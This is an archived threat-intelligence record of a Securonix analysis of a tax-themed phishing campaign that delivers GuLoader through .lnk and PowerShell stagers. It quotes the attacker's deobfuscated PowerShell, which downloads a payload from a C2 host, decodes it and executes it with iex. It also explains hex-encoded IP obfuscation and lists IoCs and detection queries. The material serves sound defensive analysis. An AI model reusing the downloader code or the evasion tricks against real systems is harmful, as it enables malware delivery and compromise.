{
	"id": "ec37dc8a-489f-4968-9e37-d701cc49f331",
	"created_at": "2026-04-06T00:12:14.009683Z",
	"updated_at": "2026-04-10T13:13:09.552805Z",
	"deleted_at": null,
	"sha1_hash": "9df1db0e91d91264d95940e0fa66149873e24ca3",
	"title": "New TACTICAL#OCTOPUS Attack Campaign Targets US Entities with Malware Bundled in Tax-Themed Documents",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 12609615,
	"plain_text": "New TACTICAL#OCTOPUS Attack Campaign Targets US Entities with\r\nMalware Bundled in Tax-Themed Documents\r\nArchived: 2026-04-05 19:26:59 UTC\r\nBy Securonix Threat Labs, Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov\r\nMarch 30, 2023, updated April 5, 2023, updated April 18, 2023\r\nUpdate: TACTICAL#OCTOPUS Campaign continues targeting US victims\r\nWhile today is the last day for US income tax submissions, the TACTICAL#OCTOPUS campaign continues to target US\r\nvictims. New samples have once again emerged related to this ongoing threat. \r\nThe GuLoader/CloudEyE malware appears to be the primary malware used to deliver other payloads. Interestingly enough,\r\nmost of the heavily obfuscated stagers that the Threat Research team tracked initially, were no longer used. Instead, the\r\nshortcut file downloads and executes the GuLoader malware directly. \r\nLike the original infection stage, the malware is delivered to the user via a phishing email using tax-themed lures. The email\r\ncontains an attached zip file containing the shortcut containing the malicious script which looks similar to the original. \r\nFigure u_1: Lnk execution\r\nThe GuLoader malware is downloaded from hxxps://rebrand[.]ly/spf5wcc and saved as C:\\Windows\\Tasks\\Restler.com, and\r\nthe lure document is downloaded from hxxps://rebrand[.]ly/uvhzh3f and saved as C:\\Users\\Public\\info.pdf.\r\nThe malware along with the lure document are executed simultaneously. Per usual, the lure document is another tax-related\r\nfile. \r\nhttps://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/\r\nPage 1 of 15\n\nFigure u_2: lure document\r\nOnce the GuLoader binary launches, it sleeps for roughly 30 to 60 seconds and then performs process hollowing to one of\r\ntwo IE utilities, the Internet Explorer Low-MIC Utility Tool, ielowutil.exe or ieinstal.exe as we saw previously.\r\nFigure u_3: GuLoader process hollowing to ieisntal.exe\r\nWithout going into too much detail, the malware eventually connects back to hxxp://rebrand[.]ly/spf5wcc to download\r\nfurther stagers as well as for persistence.\r\nThe Securonix Threat Research Team is keeping a close eye on the TACTICAL#OCTOPUS campaign and will provide\r\nupdates as we learn more. It’s possible that with the tax season wrapping up in the US that this campaign might shift away\r\nfrom tax-themed lures.\r\nAdditional payloads\r\nFile Name SHA256 (IoC)\r\nShortcut Files\r\nFedTaxUS.pdf.lnk 3fc89d5e3e55c0942c6093eef47d87da6c52d6c459a1ad385ae425bd70863b42\r\nZip Files (email attachments)\r\nFedTaxUS20\u002621.zip 6a45856a160185b57a2e0c059f7eced75d3117a2ead0d75c649b50d9077bdf7f\r\nBinary Files\r\nSinsring Lnningsraadenes.exe\r\n3a76d26eb6d4267c47730b002111153f17deb9ae39bbaedacc1caa7c49d1447e\r\n4d0ebfef45b40e93ec400103685032aadcb2f3427a8a2faa9a70db31bd7e81eb\r\nhttps://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/\r\nPage 2 of 15\n\nUpdate: TACTICAL#OCTOPUS campaign continues as more malicious phishing\r\ndocuments emerge\r\nSince the discovery of the TACTICAL#OCTOPUS campaign, the Securonix Threat Research team has been monitoring this\r\nongoing threat and has uncovered additional related samples and payloads. The most recent of these samples were submitted\r\n04/04/2023. \r\nOverall, the attack chain appears to have remained the same. A phishing email with a password-protected zip file is\r\ndelivered to the target using tax-themed lures. However, one noticeable difference is that the attackers have shifted from\r\nencoded IP addresses to using known, publicly available URL redirect services, in particular rebrand[.]ly. At the time of\r\nwriting, the redirect URLs have been blocked by the redirect service.\r\nAt this point in time it is safe to assume that the TACTICAL#OCTOPUS campaign is still ongoing and will likely continue\r\n(or shift gears) once the tax season in the US wraps up for the April 18th deadline. We will continue to monitor the situation\r\nand provide updates as we learn more. \r\nAdditional payloads\r\ntl;dr\r\nAs the tax deadline on April 15 approaches in the US, threat actors are ramping up tax-related phishing scams to US-based\r\nvictims to infect systems with stealthy malware.\r\nWith tax season in the US drawing to a close, threat actors are showing no sign of slowing down. The Securonix Threat\r\nResearch team has identified an ongoing hyper-targeted phishing campaign (tracked by Securonix Threat Research as\r\nTACTICAL#OCTOPUS) targeting individuals in the US using seemingly valid tax forms and contracts. Some of the lure\r\ndocuments observed contained employee W-2 tax documents, I-9, and real estate purchase contracts.\r\nHowever, behind the lure document attachment is interesting malware which features stealthy AV evasion tactics, layers of\r\ncode obfuscation and multiple C2 (command and control) channels. In this article, we’ll walk through the stages and peel\r\nback the obfuscated code to get a better understanding of the malware and attack chain.\r\nhttps://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/\r\nPage 3 of 15\n\nAttack chain overview\r\nThe attack begins with tax-related phishing emails. The email will contain a password-protected zip file, where the password\r\nis provided in the body of the email. The attachments follow a common naming convention using tax-like language such as\r\nTitleContractDocs.zip or JRCLIENTCOPY3122.zip.\r\nContained within the .zip file is a single image file (typically a .png file) and a shortcut (.lnk) file. Code execution begins\r\nwhen the user double clicks the shortcut file.\r\nOnce code execution begins, a series of VBScript and PowerShell stagers pull further payloads from the C2 server.\r\nEventually we’ll observe in-memory binary code execution through PowerShell reflection techniques using legitimate\r\nWindows processes.\r\nStage 1: initial infection\r\nCode execution begins when the victim user extracts the .zip file contents and executes the shortcut file masquerading as a\r\n.pdf link “MOREZT TAX FILES.pdf.lnk”. As seen in the figure below, the .lnk file contains a PowerShell one liner\r\ncommand that downloads the Visual Basic file “Sammenstyrtningens242.vbs” from the attacker’s C2 server, saves it locally\r\nas “C:\\Windows\\Tasks\\Tepolerd.vbs” and then runs it.\r\nFigure 1: TACTICAL#OCTOPUS shortcut file information including executed command line\r\n…encoded IP addresses?\r\nHold up, let’s pause for a second and talk about that odd looking URL. Believe it or not, it is simply an encoded IP address\r\nand there is no DNS resolution of any kind happening behind the scenes. This IP address obfuscation method is documented,\r\nbut rarely used especially when it comes to mixed notation; however, some IP obfuscation tools can be found online. If you\r\nwere to copy the URL into your browser or terminal window, you’ll notice that it will be automatically translated into an IP.\r\nLet’s describe how this works using a known safer example (Open DNS): 208.67.222.123\r\nThe value is essentially a combination of hexadecimal and decimal encoding of an IP address. The first IP octet is encoded\r\nusing hex, separated by a dot. The remaining octets are then decimal encoded.\r\n0xD0.4447867 essentially translates to 208.67.222.123\r\nhttps://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/\r\nPage 4 of 15\n\nThe IP address used by the attacker’s .lnk code: 0x05.526436 becomes 5.8.8[.]100\r\nOddly enough, this method to hide IP addresses only works where at least the first octet is hex encoded. Decimal encoding\r\nthe first octet with hex proceeding will not work. The graphic below breaks this down with some examples:\r\nFigure 2: Encoded URL examples\r\nContinuing on, the PowerShell script also downloads a file called “info.pdf” and saves it to the local public user’s directory\r\nin “C:\\Users\\Public\\infos.pdf”. Once downloaded it is then opened and presented to the user from whatever application is\r\nconfigured as the default PDF viewer.\r\nAll the file samples our team analyzed were various forms of tax documents, though none could be verified as being valid.\r\nThese ranged from several employee W-2 forms to I-9 documents, to real estate contracts. The two W-2 tax forms below\r\nappear to be from an Okta employee and another employee of Murray Logan Electricals and Wiring.\r\nThese documents are known as lure documents to provide the victim user with an expected result to the action taken\r\n(opening a “PDF” file). Even though the goal of the attacker is code execution, a user may get suspicious when nothing\r\nhappens, hence the need for a valid lure.\r\nhttps://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/\r\nPage 5 of 15\n\nFigure 3: A sample of various lure documents\r\nNext, let’s circle back to the downloaded .VBS script that gets downloaded and executed just before the lure document\r\nopens.\r\nStage 2: VBS script execution\r\nThe VBS script that gets executed from the shortcut file, “Sammenstyrtningens242.vbs” is heavily obfuscated. It contains\r\nmostly nonsensical comments, likely to try to bypass or confuse AV detection.\r\nFigure 4: Obfuscated VBScript example\r\nhttps://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/\r\nPage 6 of 15\n\nAs you can see in the figure above, there is a concatenated PowerShell script contained within the VB script file. This gets\r\nexecuted by the default PowerShell.exe process.\r\nStage 3: PowerShell execution\r\nThe obfuscation methods used in this PowerShell script are a bit unconventional. It involves a function that manipulates any\r\nstring called into it. Each of the strings (represented in green) are passed into the function “Unrhe9” and converted into valid\r\nPowerShell syntax that can then be executed.\r\nFigure 5: Obfuscated PowerShell script extracted from VB code\r\nThe deobfuscated version of the PowerShell script gives us a bit better understanding as to the script’s intent. Overall, the\r\nscript is quite interesting due to the fact that each line gets invoked individually. Technically, the invokes could be dropped\r\nto further enhance readability.\r\nhttps://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/\r\nPage 7 of 15\n\nFigure 6: Deobfuscated PowerShell script\r\nCompounding the variables in the deobfuscated version of the script we get the final few commands that kick off the next\r\nphase of code execution.\r\nStart-BitsTransfer -Source “hxxp://5.8.8[.]100/signal/Traverser.dwp” -Destination $env:appdata\\Kommaerp.ema\r\n$Unrhe = Get-Content $env:appdata\\Kommaerp.ema\r\n$Moatingh = [System.Convert]::FromBase64String($Unrhe));\r\n$Told2 = [System.Text.Encoding]::ASCII.GetString($Moatingh))\r\n$Astrologi=$Told2.substring(183983,19725));\r\niex($Astrologi)\r\nThe same C2 server is now contacted once again to download the file Kommaerp.ema and save it to the user’s Appdata\r\ndirectory (“C:\\Users\\username\\AppData\\Roaming”). The file is downloaded using the Start-BitsTransfer PowerShell\r\nmodule.\r\nThe Kommaerp.ema file contains a giant Base64 string that gets decoded and parsed by the next few lines of code. The last\r\nline simply invokes whatever contained PowerShell code is present as a result as represented by the $Astrologi variable.\r\nStage 4: PowerShell execution\r\nThe next phase of PowerShell execution is derived from the $Astrologi variable as we discovered in the previous stage.\r\nOnce again, we see another massively obfuscated script as shown in the figure below.\r\nhttps://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/\r\nPage 8 of 15\n\nFigure 7: Stage4 obfuscated PowerShell script\r\nSimilar to what we saw in stage 3, obfuscation is mainly handled by a primary function that decodes all of the passed in\r\nstrings throughout the remainder of the script. Manually deobfuscating the strings using the “Elkaunq02” function makes the\r\nPowerShell script a bit more readable.\r\nFigure 8: Stage 4 deobfuscated PowerShell script in-memory binary execution\r\nIf you’re familiar with PowerShell in-memory code execution, the code above should look familiar. Similar versions of the\r\nsame code have been seen in the wild executing a wide range of attacks from Cobalt Strike, to a wide range of backdoor\r\nRAT malware including Kovter. It essentially leverages .NET API functionality to allocate memory space for a payload that\r\nwill be executed within the new memory space.\r\nhttps://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/\r\nPage 9 of 15\n\nA new thread is then spawned from our original process containing the payload data. The data in this case is contained inside\r\nthe $Moatingh variable. This variable was instantiated during stage 3 of the attack. If you look back, you’ll notice the\r\nvariable is set to the Base64 decoded value of the download file “Kommaerp.ema”.\r\n$Coerciona2=$env:appdata\r\n$Coerciona2=$Coerciona2+’\\Kommaerp.ema’\r\n$Unrhe = Get-Content $Coerciona2\r\n$Moatingh = [System.Convert]::FromBase64String($Unrhe));\r\nThe second half of the file contains the obfuscated stage 4 PowerShell code which we analyzed in the previous section.\r\nBinary payload analysis\r\nThe Windows binary file ieinstal.exe ends up being the victim process for our in-memory process injection technique. This\r\ndefault Windows process is located in C:\\Program Files (x86)\\Internet Explorer\\ and is responsible for installing and\r\nmanaging Internet Explorer add-ons.\r\nIn the below figure we’re able to observe the malware migrating from PowerShell and launching ieinstal.exe which then\r\nspawns its own thread. The shell code used to inject the process contained within the Kommaerp.ema file is heavily\r\nobfuscated at a binary level, however we’ll get into how we’re able to gather some interesting data from the created process.\r\nFigure 9: Procmon: PowerShell to ieinstal.exe process\r\nieinstal.exe memory dump analysis\r\nExamining the process dump file for ieinstal.exe provides some interesting insights. First, we observed C2 communication\r\nback to the original IP address (5.8.8[.]100) from the infected process. Analyzed data within the memory dump confirms that\r\nthe IP is contacted using the following parameters:\r\nGET /signal/TpRIfutRxWlhn224.dwp HTTP/1.1\r\nUser-AgentMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nAt this stage, the infection chain is completed and the attackers will have access to the target system. Without pulling\r\nadditional files from the C2 server, we observed ieinstal.exe capturing clipboard data and keystrokes as soon as it started\r\nrunning.\r\nAdditional sample analysis\r\nIn addition to the sample featured in this article, we identified several additional samples following the same pattern using\r\nunique IP addresses and URL strings. Overall, each sample followed striking similarities such as the tax related PDF (always\r\ninfo.pdf), and PowerShell/VBScript code.\r\nAll files and hashes will be provided at the end of the article for references or IoCs.\r\nC2 infrastructure and attribution\r\nTwo of three IP addresses identified in the attack were registered to Petersburg Internet Network Ltd. in the Russian\r\nFederation. This could indicate Russian origins, however the possibility of false flag operations cannot be ruled out at this\r\nhttps://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/\r\nPage 10 of 15\n\npoint.\r\nIP Address Country ISP\r\n194.180.48[.]211 US Des Capital B.V.\r\n5.8.8[.]100 RU Petersburg Internet Network Ltd.\r\n109.206.240[.]67 RU Petersburg Internet Network Ltd.\r\nC2 domains/IPs\r\nhxxp://109.206.240[.]67/oy/\r\ntcp://goodisgood[.]ru:1977\r\nhxxps://rebrand[.]ly/25a1ba\r\nhxxps://rebrand[.]ly/be263e\r\nhxxps://rebrand[.]ly/m526mvn\r\nhxxps://rebrand[.]ly/rzuw9uy\r\nhxxps://rebrand[.]ly/spf5wcc\r\nhxxps://rebrand[.]ly/uvhzh3f\r\nFull URLs\r\nhxxp//194.180.48[.]211/nini/\r\nhxxp//194.180.48[.]211/sara/\r\nhxxp://194.180.48[.]211/oy/\r\nhxxp://194.180.48[.]211/zarath/\r\nhxxp//194.180.48[.]211/fresh/\r\nhxxp//194.180.48[.]211/ryan/\r\nhxxp//5.8.8[.]100/signal/\r\nhxxp//109.206.240[.]67/xlog/\r\nhxxp//109.206.240[.]67/anom/\r\nhxxp//109.206.240[.]67/shitter/\r\nConclusion\r\nSince all the samples that Securonix Threat Research identified are fairly recent, it’s clear that this campaign is still ongoing.\r\nBusinesses and individuals should be extra vigilant when opening tax-related emails, especially as the tax deadline in the US\r\napproaches.\r\nThe TACTICAL#OCTOPUS campaign is overall relatively complex from an initial compromise standpoint. The initial code\r\nexecution tactic through .lnk file execution is trivial and used by many threat actors these days. However, the PowerShell\r\nand VBScript code used are unique and sophisticated, especially from an AV avoidance and obfuscation standpoint making\r\nthis campaign important to watch.\r\nhttps://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/\r\nPage 11 of 15\n\nSecuronix recommendations and mitigations\r\nAvoid opening any attachments especially those that are unexpected or are from outside the organization. Be extra\r\nvigilant with tax-related emails.\r\nImplement an application whitelisting policy to restrict the execution of unknown binaries.\r\nDeploy additional process-level logging such as ⦁ Sysmon and ⦁ PowerShel⦁ l logging for additional log detection\r\ncoverage.\r\nSecuronix customers can scan endpoints using the Securonix Seeder Hunting Queries below.\r\nMITRE ATT\u0026CK Matrix\r\nTactic Technique\r\nInitial Access\r\nT1566: Phishing\r\nT1566.001: Phishing: Spearphishing Attachment\r\nExecution\r\nT1204.002: User Execution: Malicious File\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nT1059.005: Command and Scripting Interpreter: Visual Basic\r\nT1204.001: User Execution: Malicious Link\r\nDefense Evasion\r\nT1055.009: Process Injection: Proc Memory\r\nT1620: Reflective Code Loading\r\nCommand and Control\r\nT1573.001: Encrypted Channel: Symmetric Cryptography\r\nT1105: Ingress Tool Transfer\r\nExfiltration T1041: Exfiltration Over C2 Channel\r\nAnalyzed file hashes\r\nFile Name SHA256 (IoC)\r\nShortcut Files\r\nMOREZT TAX.jpg.lnk 0d1dad9f09654d9f111e2e4d9451708237f2129cb674c380057938ea7a7ba4bf\r\nJRCLIENTCOPY3122.pdf.lnk 5ac2a9e27896c467eb5363ab24c931a5b721c3a715590441a936eb49b06dfb3e\r\nBETTYGILDOC.pdf.lnk 1dc173bba60254b915f8fa88f2ee5730f8d9ba3919ffa7c7a3cc28c3728c43ec\r\nTitleContractDocs.pdf.lnk ff6c37680217620045135d6ec7ac0f7ca7560d8e189c701837f335e45d3213de\r\nFIELDSGOVTCOPY2021.pdf.lnk 2893eab39fa7bd0db75cb5657565e04f1a438e6397f7fd2990f0a03e9954bbc0\r\nPaulajonesClienttaxs2022.pdf.lnk fc06588222dd51a08f9359e5d6ce9ee8c2ae90ff700533bc47d2ab4ead0071e8\r\nBrentFisherUSTax.pdf.lnk 562ec1673c90fd1932f60b0f4e26e02a059347b88aa2d8fc0bddd058427d6946\r\nDoc065754.lnk 86a3eea0abb10bdcac6a00b9bdf1d76a408fbdd27db8be389757e069a2855f11\r\n1099R 2022.pdf.lnk 63559daa72c778e9657ca53e2a72deb541cdec3e0d36ecf04d15ddbf3786aea8\r\nPANYANG_21FED_1040.lnk 23597910ec60cf8b97144447c5cddd2e657d09e2f2008d53a3834b6058f36a41\r\nDoc436985.pdf.lnk 76c22709a51448a508852f449d1b756d45754150093d6a5fb5eaef34673bbd82\r\nhttps://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/\r\nPage 12 of 15\n\nFile Name SHA256 (IoC)\r\nW2\u00261040.pdf.lnk 0cea74786657ad2094759e2a512a648efecf9a33d6ce3ee0c7ac1840dbf276cc\r\nS_K\r\n_Beaumont_TaxDocuments.pdf.lnk\r\nab1eb7454d2cc5549c4c09422cdeb2fbf9254a977a42b03ca887a42d4e66f84e\r\nInformation.pdf.lnk 6e3b660bd913e1bd538811501fbc42ad9f4786c8258b7120e76d671c23252403\r\nChargeback_Dispute_Details.pdf.lnk 46c5b1f2090450b537389b1e221f7264a460fe47387e746555ba0543c0782ef9\r\nS _Moretz_TaxDocuments.pdf.lnk e72dc71684d57785129e128b05212467e528912106c8fe63c25baacbf0340ea5\r\nZip Files (email attachments)\r\nJRCLIENTCOPY3122.zip 907756fb841a1ed62e245a9d97b8c8ead78fa4fb6ec4357088f283e8db4f62f4\r\nTitleContractDocs.zip e45adb5a0dcfde2f3a70d2d4e91d6bcaec54858c61f0ecce3fc76d8cf6cf12e6\r\nFIELDSGOVTCOPY2021.zip 4080b180ba4b33becc75686bc7f739a7d0ca6df446f3f6749bcd7a356c76ce66\r\nsaxton_returns.zip 1b3d2a6e04de259510090506a7357bdeced4f8c2c95607359837b105409abad0\r\n2022_docs.zip f79c1d0ddadc7222e3eaa82416f515ef263ae6b3ba2a8d87f4f458b2ef98e8ea\r\nBRENTFISHER_FEDTAXES.zip 34bdc88439fa6c06be4fa4b8a1747366157e71f196a20686366b8dacaf9e3ffc\r\nPanYangFederalUSTaxDocs.zip 2f2892ce3885179c5ddd3ced5f8e3ae5f890ed0cef989f62a0285de136e31fa3\r\nFedTax_Docs_BrentF.zip 8ab6933a480b546996a19daa13a7b5b0429099bfea57d42055f97fe9d3e251cf\r\nS_K\r\n_Beaumont_TaxDocuments.pdf.zip\r\ne4a600fe6f9928350d460b97162569d32e6acf70c7fe3ada68cbb6e861eeb972\r\nChargeback_Dispute_Details.zip a639cb71f6f021a531d79c4ec2c9b22c5244874f6c959135d843e1db3476b1f4\r\nS _Moretz_TaxDocuments.pdf.zip d562a9e5cd1dc88de6308986d68edfd90dd0111f7971ec252dd09f12eb2f8b1a\r\nC2-hosted files\r\nEAbsGhbSQL10.aca 7BD663EA34E358050986BDE528612039F476F3B315EE169C79359177A8D01E03\r\ninfo.pdf\r\n057B1DA6363EEDC2156003B8547AC57116793278B0B0B21767CC05FC8B143B99\r\n6E641DE68BFD6AB98E297704AB27F784CDE401EAAA2D3F7D8653553C60F977DA\r\n85E27758A4ED4B7754B8003DE1313540678F216BD21D883F03C2512BC89C32DC\r\n000BC200B6BA104AC05DCBCB9B54A4F9610D8190AB5F9A4A1A5B189B0057F00\r\nLeekish.vbs C914DAB00F2B1D63C50EB217EEB29BCD5FE20B4E61538B0D9D052FF1B746FD7\r\nsafe.exe A373F01A9CD3E3DB683AB892027C1A529BDB7F1F8A8C114BE940CD10A27366C\r\nCEAdePBiyVNfeZZlA176.lpk CF55584023A70E43EC2637532CC8150C00F007825F705EF07DCEF39C9F6B74EF\r\nKriminalromaners.vbs 88B917C71897D8D516A5386818E83A62CC210FD52B52EE069875E56D5142E015\r\nRHyiKHQlrxxrmvViuoCaYwH64.pfb EF7FB7AF43F7CE46209DA523F6B168DE225694760F2E8243158D65BEB31827DE\r\nUnsquee.dwp 0DABFF6F0DD86D59A869F2633F4EEBC31A96B70BF90ED8E766CA22B49F68459C\r\nUntuber88.vbs E5FD42C20D0C95EDD3E1D12DDC4DDBE99A4F2ADECFE0A14250DED98F189599\r\nhttps://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/\r\nPage 13 of 15\n\nFile Name SHA256 (IoC)\r\nVejlensisk90.vbs FFE477577469C87C606E0CBD9D0DA68446CD8D895E4F4AB0A083F0A05AC8AB2\r\nBlotlg.vbs\r\nJubilets1.vbs\r\nTepolerd.vbs\r\n20D129D8AD727DC816FAC7AB3DC4D3D3F3666220822DE0D722DB763FA138A24\r\nwaRzdUl247.pfb 09B1FD66B0EC4B57861DB145BF4CEFFF0EE5634EB5A156D04D04F8495D309DAB\r\nytcJMQnIg146.toc 0A542E1D7444DF99461DE2CA49A3859AA1A35B458F8F77B205AEA0D14E6620A2\r\nDWKZN62.u32 73E714EE977BA7C4CD32F52539F94031B52FCAA90448CEAEB910FD22932E9D4E\r\nFhQgGIViPzDcYLTxWDvRglZ48.afm C5BE50F35FBDA3FD8B996659FE3B1A648AC3EB4DED45825A0C158A1303CDAE\r\nHygiastic.psm DD7E1D8F39581E3F90E51E082E11344EED2668C0377439D769DDF5422B4C66FB\r\nImnkLSwWhaQsuZXYPs172.pcx 27806A2C2A1246965D0E15D20DC6F3D46DF0CB242C3296311F40DD63991CD02C\r\nJKmoXyx233.prx 149EE334DC6CD0593AEC294F405A9390623AB198080B476122433048402F93B4\r\nPalatophar.pcx FC1F9FC56F9B87242D205D67C40E5772C0A510650D83F1B7429DD037754C8EAF\r\nPilhenv.vbs 34A689FC4CA1F0B001BEE4B0640487E98FCE0C67EC67CDF076D86EFE9B10072F\r\nPwkejoRQqhGAqogDJJHh197.afm EF1065677B256644113648CAA26D75512BEA881C4953396DA561EAE8231F56F3\r\nSammenstyrtningens242.vbs 926FE7F70C86B5C16A632344191820206772F8C53AC075446B138D209A1BF22A\r\nSammenstyrtningens242A.vbs 87DC4E513A7023F1B8D38499C6FEDE4E6AB7EC563E1F0DBBD5E9B365E213D14\r\nTpRIfutRxWlhn224.dwp 18D7BE1DFAED274670EA6CDD3D45E864CDCA173D5E71753DC69910334D0A92F\r\nTraverser.dwp 2CF0F2C5D665438AC31A6B2880CD8FF637E7D4339781B5F2D26E7BC6058B737F\r\nCateg31.xlsx E1C6E7D919EEBE7CF75D5ACBAE975BB4AD3C760FF303714297E9F7072DF582D0\r\nMidd.dwp E587FB76C736B268FCA167994649B09401FEF04A433F6C28480C315C83181E24\r\nMqYHDjH134.pcz F2D64F2CC3902C13E457656C06E2AF1B4E11EC3F60E3EBC5D8F9E7BB3E673296\r\nEksegese64.vbs C8BE839ED95D6BCFD484BA7A9389BA0A56CFD8841C9FDE04FE5651ED853BEE\r\nEksegese641.vbs F0382214714ADC0D3C71FC5CD63F99F17F6A2E0A3CF45378CDAF236770793D65\r\njrJzeVzMzpIxWFk86.prx 4DBD53B7CE4753778B1C2375A21FC4641E36D57880579779B376D4D8B591C6F7\r\nnWsxW93.smi E03E3C2C78A20A58E6B9546F62DCE95233362EEE7534785CE0B79F7F0886BA5B\r\nPetYUsaYzfzGCi67NW.psm 6E5163D9B9992847CAB46D48C691C2A04F6D01E5B430DEA02AA2A8119C299047\r\nA Sample of relevant Securonix detection policies:\r\nEDR-ALL-1197-RU\r\nEDR-ALL-1198-RU\r\nPSH-ALL-227-RU\r\nPSH-ALL-228-RU\r\nPSH-ALL-313-RU\r\nhttps://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/\r\nPage 14 of 15\n\nRelevant Spotter queries\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create”\r\nOR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction =\r\n“Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND\r\n(destinationprocessname ENDS WITH “powershell.exe” OR filename = “PowerShell.EXE” OR\r\ndestinationprocessname ENDS WITH “cmd.exe” OR filename = “Cmd.Exe”) AND (resourcecustomfield1\r\nCONTAINS “https://0x” OR resourcecustomfield1 CONTAINS “http://0x”)\r\n(rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Application Firewall” OR\r\nrg_functionality = “Web Proxy”) AND (destinationaddress = “194.180.48[.]211” OR destinationaddress =\r\n“5.8.8[.]100” OR destinationaddress = “109.206.240[.]67”)\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS ” -bxor”\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND (message CONTAINS\r\n“System.Reflection.Assembly.Load($” OR message CONTAINS “[System.Reflection.Assembly]::Load($” OR\r\nmessage CONTAINS “[Reflection.Assembly]::Load($” OR message CONTAINS\r\n“System.Reflection.AssemblyName” OR message CONTAINS “Reflection.Emit.AssemblyBuilderAccess” OR\r\nmessage CONTAINS “Runtime.InteropServices.DllImportAttribute”) AND (message NOT CONTAINS “Generated\r\nby= Microsoft Corporation” OR message NOT CONTAINS “Generated by: Microsoft Corporation”)\r\nindex = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS “Start-BitsTransfer” AND message CONTAINS “-Source” AND message CONTAINS “-Destination” AND message\r\nCONTAINS “http”\r\nReferences:\r\nMicrosoft PowerShell Modules: Start-BitsTransfer\r\nhttps://learn.microsoft.com/en-us/powershell/module/bitstransfer/start-bitstransfer?view=windowsserver2022-ps\r\nInspecting a PowerShell Cobalt Strike Beacon\r\nhttps://forensicitguy.github.io/inspecting-powershell-cobalt-strike-beacon/\r\nThe many faces of an IP address\r\nhttps://www.hacksparrow.com/networking/many-faces-of-ip-address.html#2-0-optimized-dotted-decimal-notation\r\nRocketCyber: Cyber Cases from the SOC – Fileless Malware Kovter\r\nhttps://www.rocketcyber.com/blog-cyber-cases-from-the-soc-fileless-malware-kovter\r\nSource: https://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/\r\nhttps://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.securonix.com/blog/new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents/"
	],
	"report_names": [
		"new-tacticaloctopus-attack-campaign-targets-us-entities-with-malware-bundled-in-tax-themed-documents"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434334,
	"ts_updated_at": 1775826789,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9df1db0e91d91264d95940e0fa66149873e24ca3.pdf",
		"text": "https://archive.orkl.eu/9df1db0e91d91264d95940e0fa66149873e24ca3.txt",
		"img": "https://archive.orkl.eu/9df1db0e91d91264d95940e0fa66149873e24ca3.jpg"
	}
}